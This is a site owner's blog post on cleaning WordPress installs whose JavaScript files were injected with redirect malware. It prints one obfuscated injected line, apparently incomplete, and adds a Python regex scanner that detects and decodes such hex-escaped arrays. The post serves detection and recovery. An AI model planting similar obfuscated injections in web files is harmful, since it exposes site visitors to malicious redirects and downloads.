There is a nasty piece of malware hacking WordPress websites. The malware randomly redirects every page to other websites that host malicious downloads to infect users' systems.
This virus targets the jQuery.js files. Normally core WordPress files are pretty secure if you constantly update your software, but it is rather difficult to manage multiple different WordPress websites.
I typically don't allow auto-update because it has caused my sites to go down, but at the same time that leaves my sites open to WP vulnerabilities.
I found 3 sites that had a redirect applied to the whole site. I checked my .htaccess and didn't see anything strange, so I installed a virus/malware scanner plugin called Wordfence, and the results were astounding.
- File appears to be malicious: wp-admin/js/bookmarklet.js
- File appears to be malicious: wp-admin/js/bookmarklet.min.js
- File appears to be malicious: wp-admin/js/color-picker.js
- File appears to be malicious: wp-admin/js/color-picker.min.js
- File appears to be malicious: wp-admin/js/comment.js
- File appears to be malicious: wp-admin/js/comment.min.js
- File appears to be malicious: wp-admin/js/custom-header.js
- File appears to be malicious: wp-admin/js/customize-controls.js
- File appears to be malicious: wp-admin/js/customize-controls.min.js
- File appears to be malicious: wp-admin/js/customize-nav-menus.js
- File appears to be malicious: wp-admin/js/customize-nav-menus.min.js
- File appears to be malicious: wp-admin/js/customize-widgets.js
- File appears to be malicious: wp-admin/js/customize-widgets.min.js
- File appears to be malicious: wp-admin/js/edit-comments.js
- File appears to be malicious: wp-admin/js/edit-comments.min.js
- File appears to be malicious: wp-admin/js/editor-expand.js
- File appears to be malicious: wp-admin/js/editor-expand.min.js
- File appears to be malicious: wp-admin/js/editor.js
- File appears to be malicious: wp-admin/js/editor.min.js
- File appears to be malicious: wp-admin/js/gallery.js
- File appears to be malicious: wp-admin/js/gallery.min.js
- File appears to be malicious: wp-admin/js/image-edit.js
- File appears to be malicious: wp-admin/js/image-edit.min.js
- File appears to be malicious: wp-admin/js/inline-edit-post.js
- File appears to be malicious: wp-admin/js/inline-edit-post.min.js
- File appears to be malicious: wp-admin/js/inline-edit-tax.js
Of course this was only a snippet of the infected files; basically every file with a .js extension had been compromised. This included core WP, plugins, and themes.
Looking at the source code, they all had this:
//var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))//
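To find this kind of injection across a whole install without depending on a plugin, here is an added example (my own code, not from the post or from Wordfence): it walks a directory, flags any .js file that carries a hex-escaped "var _0x...=[...]" string array like the one above, and decodes the escapes so you can see which strings (join, write, ...) the snippet hides. The infected sample is the line quoted above with the blog's smart quotes replaced by plain ones; the clean sample is constructed.

```python
import os
import re

# Constructed samples: the injected line quoted in the post (plain quotes),
# followed by a harmless header, and a clean file with no injection.
INFECTED_SAMPLE = (
    r'//var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x73\x3C",'
    r'"\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]]'
    r'(_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))//'
    "\n/*! jQuery v1.12.4 */\n"
)
CLEAN_SAMPLE = "/*! jQuery v1.12.4 */\nvar jQuery = function () {};\n"

# A "var _0x....=[ ... ]" array whose elements are all "\xNN" escapes (or "").
ARRAY_RE = re.compile(
    r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[((?:"(?:\\x[0-9a-fA-F]{2})*"\s*,?\s*)+)\]'
)
ELEMENT_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')
HEX_RE = re.compile(r'\\x([0-9a-fA-F]{2})')


def decode_elements(array_body):
    """Translate each "\\xNN..." element into the plain string it hides."""
    return [HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), e)
            for e in ELEMENT_RE.findall(array_body)]


def scan_text(text):
    """Return [(array_name, decoded_strings)] for every injected array found."""
    return [(m.group(1), decode_elements(m.group(2)))
            for m in ARRAY_RE.finditer(text)]


def scan_tree(root):
    """Walk a WordPress install and map each flagged .js path to its findings."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    import sys
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for name, strings in hits:
            print(f"{path}: {name} -> {strings}")
```

Run it against the web root (for example `python scan.py /var/www/html`); a hit on a core file that a fresh copy of WordPress does not contain is a strong signal, and any file that gets re-flagged after you overwrite it points to a persistence mechanism elsewhere, as the post describes.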
The easiest way to fix this is to just overwrite the files with a fresh, clean copy of WordPress.
This actually worked for 1 day.
The infection of all the jQuery files came back. Apparently, there was a sneaky .php back door file that the attacker was using. My concern was whether this code had been injected on the public web side or into the database.
The only solution that let me be 100% sure was to delete everything on the server and do a clean install. I know this is a pain but it's the only solution I had. Luckily I had a backup of all my content and it didn't take too long.
So far after 48 hours the solution still seems to be working.
In the meantime I will continue to apply this to the other infected sites; I have also created a much stronger password and tightened the directory permissions with chmod.
Hopefully this solves the problem.